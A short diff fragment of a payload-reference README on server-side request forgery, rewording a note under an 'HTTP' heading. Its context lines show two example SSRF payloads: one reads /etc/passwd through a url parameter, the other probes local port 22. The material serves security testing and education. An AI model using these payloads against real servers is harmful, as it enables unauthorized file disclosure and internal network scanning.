swisskyrepo/PayloadsAllTheThings/Server Side Request Forgery/README.md

 ssrf.php?url=file:///etc/passwd
 ```

+### HTTP

-Http: allows an attacker to fetch any content from the web, it can also be used to scan ports.
+Allows an attacker to fetch any content from the web, it can also be used to scan ports.

 ```powershell
 ssrf.php?url=http://127.0.0.1:22